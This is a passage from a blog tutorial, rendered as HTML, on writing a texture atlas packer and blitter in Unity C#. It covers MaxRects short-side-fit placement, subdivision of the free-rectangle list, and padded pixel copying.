<span class="n">results</span><span class="p">.</span><span class="n">rects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">bestRect</span><span class="p">);</span>
<span class="n">texturesToPlace</span><span class="p">.</span><span class="n">Remove</span><span class="p">(</span><span class="n">bestTex</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">break</span><span class="p">;</span> <span class="c1">//no room left</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">results</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>Notice that the scores I was talking about above are named shortSideScore and longSideScore in this code example. The results object we add textures/rectangles to is the AtlasLayout struct we’re going to return. Then we exit the function by returning that struct. In the example above, if we run out of space in the atlas, the packer simply exits early.</p>
<p>In a production system, you’ll want to do something more intelligent than this, but what you do is dependent on your project. For example, I worked on a game with very strict memory budgets for our environment artists. The atlas for an environment couldn’t exceed 1024x1024, so if we went over, the atlasser would expand the target atlas to a size big enough for the textures to fit, but return an error. This allowed the artists to visualize what was exceeding the atlas bounds, but still prevented overly large atlasses from entering production.</p>
<p>Next, it’s time to add some actual texture packing logic to it. To do that we need to flesh out two functions that you may have noticed above:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="k">static</span> <span class="n">Rect</span> <span class="nf">FindIdealRect</span><span class="p">(</span><span class="kt">int</span> <span class="n">width</span><span class="p">,</span> <span class="kt">int</span> <span class="n">height</span><span class="p">,</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span><span class="p">,</span>
<span class="n">ref</span> <span class="kt">int</span> <span class="n">bestShortSideFit</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">int</span> <span class="n">bestLongSideFit</span><span class="p">);</span>
<span class="k">private</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">RemoveRectFromFreeList</span><span class="p">(</span><span class="n">Rect</span> <span class="n">rectToRemove</span><span class="p">,</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span><span class="p">);</span></code></pre></figure>
<h3 id="the-placement-function">The Placement Function</h3>
<p>The Placement Function is where we’re going to actually find a rectangle in the atlas to assign to a texture. There are lots of ways to pick a rectangle out of the free list, but the heuristic I’m going to use is the “Short Side Fit” heuristic. This means that we are going to try to find a free rectangle which has the least amount of remaining space along 1 dimension. This sounds much more abstract than it looks like in code, don’t worry.</p>
<p>So that we have a bit of context, let’s start this section by taking a look at what this function look like <em>without</em> the finding/scoring logic.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="k">static</span> <span class="n">Rect</span> <span class="nf">FindIdealRect</span><span class="p">(</span><span class="kt">int</span> <span class="n">width</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">height</span><span class="p">,</span>
<span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span><span class="p">,</span>
<span class="n">ref</span> <span class="kt">int</span> <span class="n">bestShortSideFit</span><span class="p">,</span>
<span class="n">ref</span> <span class="kt">int</span> <span class="n">bestLongSideFit</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">bestNode</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Rect</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">freeRects</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">width</span> <span class="o">>=</span> <span class="n">width</span> <span class="o">&&</span> <span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">height</span> <span class="o">>=</span> <span class="n">height</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// score the rect here</span>
<span class="c1">// if score is the best, replace bestNode with this rect,</span>
<span class="c1">// and set bestShortSideFit and bestLongSideFit to new</span>
<span class="c1">// values</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">bestNode</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>As you can see, there really isn’t too much to talk about here, it’s just easier to think about the next part when you know how it all fits together.</p>
<p>Let’s look at the scoring code next. Remember all we care about is how much space is left over in the freeRectangle once we place our texture rect into it:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">//score the rect here</span>
<span class="kt">int</span> <span class="n">remainingX</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">width</span> <span class="o">-</span> <span class="n">width</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">remainingY</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">height</span> <span class="o">-</span> <span class="n">height</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">shortSideFit</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Min</span><span class="p">(</span><span class="n">remainingX</span><span class="p">,</span> <span class="n">remainingY</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">longSideFit</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Max</span><span class="p">(</span><span class="n">remainingX</span><span class="p">,</span> <span class="n">remainingY</span><span class="p">);</span>
<span class="c1">// if score is the best...</span></code></pre></figure>
<p>Once we know our score values, all that’s left is to see if these are the best scores we have, and do something if they are:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">// if score is the best, replace bestNode with this rect,</span>
<span class="c1">// and set bestShortSideFit and bestLongSideFit to new</span>
<span class="c1">// values</span>
<span class="k">if</span> <span class="p">(</span><span class="n">shortSideFit</span> <span class="o"><</span> <span class="n">bestShortSideFit</span> <span class="o">||</span>
<span class="p">(</span><span class="n">shortSideFit</span> <span class="o">==</span> <span class="n">bestShortSideFit</span> <span class="o">&&</span> <span class="n">longSideFit</span> <span class="o"><</span> <span class="n">bestLongSideFit</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">bestNode</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Rect</span><span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">x</span><span class="p">,</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">y</span><span class="p">,</span> <span class="n">width</span><span class="p">,</span> <span class="n">height</span><span class="p">);</span>
<span class="n">bestShortSideFit</span> <span class="o">=</span> <span class="n">shortSideFit</span><span class="p">;</span>
<span class="n">bestLongSideFit</span> <span class="o">=</span> <span class="n">longSideFit</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Remember that the bestShortSideFit and bestLongSideFit arguments are going to be read later by the PackTexture function to decide which texture to place next.</p>
<p>That’s all there is to this function! All that’s left now is for us to be able to gracefully remove a rectangle from our free list.</p>
<h3 id="the-remove-function">The Remove Function</h3>
<p>Once we’ve found our target free rect, we add that placed texture rect to our output list, and remove that texture’s area from the free rectangle that it was placed in. In a lot of cases, this is going to give us a shape that isn’t a rectangle any more.</p>
<div align="center">
<img src="/images/post_images/2016-10-11/maxrectsplit.png" />
<font size="2">Image from <a href="http://pds25.egloos.com/pds/201504/21/98/RectangleBinPack.pdf">1000 Ways to Pack The Bin</a></font>
<br /><br />
</div>
<p>However, since we are only storing rectangles in our FreeRect list, we need to split this new shape into rectangles. The MaxRect algorithm name refers to the fact that we actually are going to split these kinds of shapes into up to 4 rectangles instead of two, meaning that we will have some overlap.</p>
<p>What this overlap means in practice is that when we need to remove a rectangular area from our list of free rectangles, we have to check every rectangle in the free list and remove / subdivide all the ones that are affected, not just the one that we found to place our texture into. We also need to remove any rectangles in the free list which are wholly encompassed by another rectangle, which can happen as we add more and more textures to the atlas.</p>
<p>We’re going to put all of this in the RemvoeRectFromFreeList function that we saw earlier:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">RemoveRectFromFreeList</span><span class="p">(</span><span class="n">Rect</span> <span class="n">rectToRemove</span><span class="p">,</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span><span class="p">);</span></code></pre></figure>
<p>The signature is pretty straightforward, and to be honest, so is the function, but let’s take a look at the outline of it first:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">RemoveRectFromFreeList</span><span class="p">(</span> <span class="n">Rect</span> <span class="n">rectToRemove</span><span class="p">,</span>
<span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">freeRects</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">freeRect</span> <span class="o">=</span> <span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">freeRect</span><span class="p">.</span><span class="n">Overlaps</span><span class="p">(</span><span class="n">rectToRemove</span><span class="p">))</span>
<span class="p">{</span>
<span class="c1">//subdivide rectangle here</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">RemoveAt</span><span class="p">(</span><span class="n">i</span><span class="o">--</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">//remove free rects that are wholly contained by others</span>
<span class="p">}</span></code></pre></figure>
<p>As discussed, there’s only really two interesting parts to this function, the subdivision of affected rectangles, and the removal of ones that are wholly overlapped by larger ones.</p>
<p>Let’s look at the subdivision first, It’s tempting to think that we only need to split along the top and right sides because we will always be subtracting the texture rect from the bottom left corner of the freeRect, and if you’re always working with nicely power of two textures that may be the case, but things can get hairy when you mix in npot textures, so we check on all four sides of the input rectangle, like this:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/subdivision.png" />
<br />
<br />
</div>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">//subdivide rectangle here</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">width</span> <span class="o">&&</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">width</span> <span class="o">></span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// New node at the top side of the used node.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">></span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span> <span class="o">&&</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">height</span><span class="p">)</span> <span class="p">{</span>
<span class="n">Rect</span> <span class="n">newNode</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">height</span> <span class="o">=</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">-</span> <span class="n">newNode</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">newNode</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// New node at the bottom side of the used node.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">height</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">height</span><span class="p">)</span> <span class="p">{</span>
<span class="n">Rect</span> <span class="n">newNode</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">y</span> <span class="o">=</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">height</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">height</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">height</span> <span class="o">-</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">height</span><span class="p">);</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">newNode</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">height</span> <span class="o">&&</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">height</span> <span class="o">></span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// New node at the left side of the used node.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">></span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span> <span class="o">&&</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">width</span><span class="p">)</span> <span class="p">{</span>
<span class="n">Rect</span> <span class="n">newNode</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">width</span> <span class="o">=</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">-</span> <span class="n">newNode</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">newNode</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// New node at the right side of the used node.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">width</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">width</span><span class="p">)</span> <span class="p">{</span>
<span class="n">Rect</span> <span class="n">newNode</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">x</span> <span class="o">=</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">width</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">width</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">width</span> <span class="o">-</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">width</span><span class="p">);</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">newNode</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">RemoveAt</span><span class="p">(</span><span class="n">i</span><span class="o">--</span><span class="p">);</span></code></pre></figure>
<p>Note: this subdivision code has been shamelessly stolen from the public domain implementation of the <a href="http://wiki.unity3d.com/index.php?title=MaxRectsBinPack">MaxRect algorithm on the Unity Wiki</a>)
<br /></p>
<p>Finally, all that’s left is to prune our freeList of tiny rectangles:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">//remove free rects that are wholly contained by others</span>
<span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">freeRects</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="n">freeRects</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="o">++</span><span class="n">j</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">IsContainedIn</span><span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">j</span><span class="p">]))</span>
<span class="p">{</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">RemoveAt</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
<span class="o">--</span><span class="n">i</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">j</span><span class="p">].</span><span class="n">IsContainedIn</span><span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">]))</span>
<span class="p">{</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">RemoveAt</span><span class="p">(</span><span class="n">j</span><span class="p">);</span>
<span class="o">--</span><span class="n">j</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The only interesting part of this code is the IsContainedIn function, which is just an extension method that I added to the Rect object to make this code more readable. That method is defined as follows:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">static</span> <span class="kt">bool</span> <span class="nf">IsContainedIn</span><span class="p">(</span><span class="k">this</span> <span class="n">Rect</span> <span class="n">a</span><span class="p">,</span> <span class="n">Rect</span> <span class="n">b</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">a</span><span class="p">.</span><span class="n">x</span> <span class="o">>=</span> <span class="n">b</span><span class="p">.</span><span class="n">x</span> <span class="o">&&</span> <span class="n">a</span><span class="p">.</span><span class="n">y</span> <span class="o">>=</span> <span class="n">b</span><span class="p">.</span><span class="n">y</span>
<span class="o">&&</span> <span class="n">a</span><span class="p">.</span><span class="n">x</span><span class="o">+</span><span class="n">a</span><span class="p">.</span><span class="n">width</span> <span class="o"><=</span> <span class="n">b</span><span class="p">.</span><span class="n">x</span><span class="o">+</span><span class="n">b</span><span class="p">.</span><span class="n">width</span>
<span class="o">&&</span> <span class="n">a</span><span class="p">.</span><span class="n">y</span><span class="o">+</span><span class="n">a</span><span class="p">.</span><span class="n">height</span> <span class="o"><=</span> <span class="n">b</span><span class="p">.</span><span class="n">y</span><span class="o">+</span><span class="n">b</span><span class="p">.</span><span class="n">height</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>And with that, we’ve covered all the code needed to build a fully featured texture packer! Congratulations! The full source for the finished class is available here: [LINK TO PASTEBIN]</p>
<p>In my implementation, I wrap all of the code thus far in a TexturePacker class. I’m going to assume that you’ve done the same for the rest of this tutorial,.</p>
<p>Despite all our hard work, our journey isn’t over, it’s time to put all this code to work and actually make an atlas.</p>
<h2 id="building-the-blitter">Building the Blitter</h2>
<p>As simple as it sounds, the Blitter is actually more nuanced than the packer, because it’s where you really start to dig into the features that you want our Texture Atlasser to have. At it’s most basic, all it needs to do is to copy pixels from one texture to another, so let’s start by getting the simplest impementation possible set up:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">static</span> <span class="n">Texture2D</span> <span class="nf">MakeAtlas</span><span class="p">(</span><span class="n">ref</span> <span class="n">Texture2D</span><span class="p">[]</span> <span class="n">textures</span><span class="p">,</span> <span class="n">out</span> <span class="n">Rect</span><span class="p">[]</span> <span class="n">packedRects</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">AtlasLayout</span> <span class="n">packResults</span> <span class="o">=</span> <span class="n">TextureAtlasser</span><span class="p">.</span><span class="n">PackTextures</span><span class="p">(</span><span class="n">textures</span><span class="p">,</span> <span class="mi">2048</span><span class="p">,</span><span class="mi">2048</span><span class="p">);</span>
<span class="n">Texture2D</span> <span class="n">outAtlas</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Texture2D</span><span class="p">(</span><span class="n">packResults</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">packResults</span><span class="p">.</span><span class="n">height</span><span class="p">);</span>
<span class="n">textures</span> <span class="o">=</span> <span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">;</span>
<span class="n">packedRects</span> <span class="o">=</span> <span class="n">packResults</span><span class="p">.</span><span class="n">rects</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">rect</span> <span class="o">=</span> <span class="n">packResults</span><span class="p">.</span><span class="n">rects</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">Texture2D</span> <span class="n">readableTex</span> <span class="o">=</span> <span class="n">null</span><span class="p">;</span>
<span class="c1">//load the image uncompressed</span>
<span class="n">string</span> <span class="n">fileURL</span> <span class="o">=</span> <span class="n">AssetDatabase</span><span class="p">.</span><span class="n">GetAssetPath</span><span class="p">(</span><span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="n">byte</span><span class="p">[]</span> <span class="n">imgByes</span> <span class="o">=</span> <span class="n">File</span><span class="p">.</span><span class="n">ReadAllBytes</span><span class="p">(</span><span class="n">fileURL</span><span class="p">);</span>
<span class="n">readableTex</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Texture2D</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="n">TextureFormat</span><span class="p">.</span><span class="n">ARGB32</span><span class="p">,</span><span class="nb">false</span><span class="p">);</span>
<span class="n">readableTex</span><span class="p">.</span><span class="n">LoadImage</span><span class="p">(</span><span class="n">imgByes</span><span class="p">);</span>
<span class="n">Color</span><span class="p">[]</span> <span class="n">pixels</span> <span class="o">=</span> <span class="n">readableTex</span><span class="p">.</span><span class="n">GetPixels</span><span class="p">();</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">SetPixels</span><span class="p">((</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">y</span><span class="p">,(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">width</span><span class="p">,(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">height</span><span class="p">,</span><span class="n">pixels</span><span class="p">);</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Clamp</span><span class="p">;</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">Apply</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">outAtlas</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Make sure you set your wrap mode to clamp, otherwise you’re going to get texture seams when using textures on the edges of the atlas, that might look like this:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/textureseams.png" width="256" />
<br />
<br />
</div>
<p>You’ll know this is from your wrap mode instead of your mips because the seams won’t go away when you zoom in.</p>
<p>Also notice that in the above, I’m hardcoding the size of our atlas to be 2048x2048. This is just for brevity, in your system, you’ll likely want to revisit this and do something smarter.</p>
<p>There’s a really really big mistake that you can make in your blitter, and that’s using textures that have already been compressed by Unity. Unless you’re importing all your textures as uncompressed, Unity has likely already applied some amount of compression to the textures in your project. If we use the Unity imported textures in our atlas, when the atlas is compressed, we’re going to compress the images inside it twice, which is going to make them look far worse than they have to.</p>
<p>To get around that, you can load the image directly from disk as a byte array and use that instead (like I’m doing above). It’s a few extra lines of code that makes a big difference on your final product. Note that this will only work if your images are jpgs or pngs. If they’re tifs, or psds or something else weird, you’ll have to find a different solution.</p>
<p>What we have here is where most texture atlassing systems seem to stop, and this is a perfectly sensible place to stop if you aren’t going to be mipping your atlasses, but there are two things we can do to make this more friendly, which I’ll talk about next.</p>
<h3 id="padding-support">Padding Support</h3>
<p>One thing we can do is to add support for padding to our blit function. Padding simply means adding space between the different textures that we pack in our atlas:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/paddedatlas.png" />
<br />
<br />
</div>
<p>One key thing to note with padding in an atlas, is that we want the padding to be inner padding. For example, if we have a 512x512 texture in the atlas,and we want to add 5 pixels of padding, we are going to add the padding to the perimeter of that texture’s rectangle and render the texture into a 502x502 rectangle in the center. You can do it the other way around, but it’s easier for artists to reason about how much texture space they’re using if we can still say things like “you can fit 4 512x512 textures into a 1024x1024 atlas.”</p>
<p>This means that we’re going to have to resize our input textures on the fly. Luckily Unity has a super handy function already available to us, which takes a UV coordinate and returns the properly bilinearly sampled texel color, nifty right?</p>
<p>So what we’re going to do is modify our function signature to take an integer argument for padding:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">static</span> <span class="n">Texture2D</span> <span class="n">MakeAtlas</span><span class="p">(</span><span class="n">ref</span> <span class="n">Texture2D</span><span class="p">[]</span> <span class="n">textures</span><span class="p">,</span> <span class="n">out</span> <span class="n">Rect</span><span class="p">[]</span> <span class="n">packedRects</span><span class="p">,</span> <span class="kt">int</span> <span class="n">padding</span><span class="p">)</span></code></pre></figure>
<p>and then modify the code that’s inside the for loop we saw above:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">rect</span> <span class="o">=</span> <span class="n">packResults</span><span class="p">.</span><span class="n">rects</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">Texture2D</span> <span class="n">readableTex</span> <span class="o">=</span> <span class="n">null</span><span class="p">;</span>
<span class="c1">//load the image uncompressed</span>
<span class="n">string</span> <span class="n">fileURL</span> <span class="o">=</span> <span class="n">AssetDatabase</span><span class="p">.</span><span class="n">GetAssetPath</span><span class="p">(</span><span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="n">byte</span><span class="p">[]</span> <span class="n">imgByes</span> <span class="o">=</span> <span class="n">File</span><span class="p">.</span><span class="n">ReadAllBytes</span><span class="p">(</span><span class="n">fileURL</span><span class="p">);</span>
<span class="n">readableTex</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Texture2D</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="n">TextureFormat</span><span class="p">.</span><span class="n">ARGB32</span><span class="p">,</span><span class="nb">false</span><span class="p">);</span>
<span class="n">readableTex</span><span class="p">.</span><span class="n">LoadImage</span><span class="p">(</span><span class="n">imgByes</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">localPadding</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Min</span><span class="p">(</span><span class="n">padding</span><span class="p">,</span> <span class="n">readableTex</span><span class="p">.</span><span class="n">width</span> <span class="o">/</span><span class="mi">4</span><span class="p">);</span>
<span class="n">rect</span><span class="p">.</span><span class="n">x</span> <span class="o">+=</span> <span class="n">localPadding</span><span class="p">;</span>
